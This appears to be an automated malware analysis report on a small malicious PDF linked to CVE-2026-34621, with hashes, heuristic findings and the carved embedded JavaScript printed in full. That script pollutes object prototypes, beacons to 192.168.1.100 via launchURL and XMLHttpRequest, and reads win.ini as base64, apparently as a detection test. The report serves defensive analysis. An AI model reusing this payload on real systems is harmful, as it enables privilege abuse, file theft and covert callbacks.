Malicious PDF — malware analysis report

Static analysis result for SHA-256 2d887cfaeb10c093…

MALICIOUS

PDF

1.4 KB First seen: 2026-05-09
MD5: d7e0692517a4c34004d0bf485c90fc1e SHA-1: 78af961986b16a62b17208e8e3a179838f644e19 SHA-256: 2d887cfaeb10c09305d0156dce0ecf18f80170fb901952e345b51f5b3729db36
174 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9994

Heuristics 7

  • Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_34621_RELATED
    PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript issues an HTTP request on open low PDF_JS_NETWORK_BEACON
    Embedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).
    Matched line in script
    try {
        var x = new XMLHttpRequest();
        x.open("GET", "http://192.168.1.100/beacon2", false);
  • PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCH
    Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
    Matched line in script
    try {
        app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
    } catch(e1) {}
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.100/cve-2026-34621-beacon Referenced by PDF JavaScript
    • http://192.168.1.100/beacon2Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xC7 888 bytes
SHA-256: c29b5f405c84012c9060fca049c5f279d22730475e17c21232b93610afbf0f63
Preview script
First 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
    Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}

// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
    app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}

// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
    util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}

// Test 3: collab/SOAP outbound (alternate network path)
try {
    var x = new XMLHttpRequest();
    x.open("GET", "http://192.168.1.100/beacon2", false);
    x.send();
} catch(e3) {}

app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
javascript_obj0004_001.js pdf-javascript-stream PDF /JS object 4 at offset 0xE8 1161 bytes
SHA-256: 597d5f794aecc980716bc1279aad0a6c5e316447095ae18d8f2f0f1600bf50f2
Preview script
First 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
    Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}

// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
    app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}

// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
    util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}

// Test 3: collab/SOAP outbound (alternate network path)
try {
    var x = new XMLHttpRequest();
    x.open("GET", "http://192.168.1.100/beacon2", false);
    x.send();
} catch(e3) {}

app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");

endstream
endobj
5 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000082 00000 n 
0000000139 00000 n 
0000000199 00000 n 
0000001138 00000 n 
trailer
<< /Size 6 /Root 1 0 R >>
startxref
1209
%%EOF